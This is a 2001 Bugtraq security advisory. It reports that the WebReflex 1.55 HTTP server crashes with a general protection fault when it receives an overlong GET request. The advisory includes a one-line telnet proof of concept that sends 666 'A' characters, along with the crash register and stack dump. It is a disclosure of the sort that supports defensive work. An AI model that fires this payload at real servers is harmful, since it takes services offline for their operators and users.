[19390] in bugtraq
WebReflex 1.55 HTTPd DoS
daemon@ATHENA.MIT.EDU (slipy@B10Z.NET)
Tue Feb 27 15:41:53 2001
Message-ID: <20010227053443.15865.qmail@securityfocus.com>
Date: Tue, 27 Feb 2001 05:34:43 -0000
Reply-To: slipy@B10Z.NET
From: slipy@B10Z.NET
To: BUGTRAQ@SECURITYFOCUS.COM
Introduction:
WebReflex is an easy to use web server that's easy
to set up and use. It has many features like a limitless
amount of concurrent requests, Drive and directory
lists, Built in server side image-maps, Implementation
of the CGI-WIN standard, User defined directory
index files, User defined error files, Built in MIME type
mappings plus user defined mappings, Built in server-
push using sequence files, Log file using the
common log file format and all the rest. The best
feature of this server is the ability to run it from a CD-
ROM.
The Vendors website is:
http://www.sapio.com/reflex/
Problem: Denial of Service Attack
WebReflex 1.55 is vulnerable to a simple Denial of
Service attack which will result in the program
causing a General Protection Fault and end up quiting
the program. WebReflex is for the Microsoft (c)
operating systems, all apear to be vulnerable.
Examples:
echo "GET " `perl -e 'print "A" x 666'` | telnet
192.168.0.20 80
^^ = Will cause the program to quit within seconds
and display:
REFLEX16 caused a general protection fault
in module KRNL386.EXE at 0001:00008aee.
Registers:
EAX=86cf0000 CS=014f EIP=00008aee
EFLGS=00000282 EBX=830f000a SS=86f7
ESP=00008d86 EBP=00008da0 ECX=0000000a
DS=0167 ESI=00009051 FS=0000 EDX=ffff8dae
ES=86ef EDI=00008c82 GS=0000
Bytes at CS:EIP:
07 1f 61 c3 06 2e 8e 06 02 00 26 89 16 f4 12 26
Stack dump:
41414141 41414141 41414141 41414141 41414141
41414141 41414141 41414141 41414141 41414141
41414141 41414141 41414141 41414141 41414141
41414141
Solution:
Vendor has been notified, and waiting for reply.
--------------------
b10z HTTPd Advisory
slipy@b10z.net
Found: February 27th, 2001.
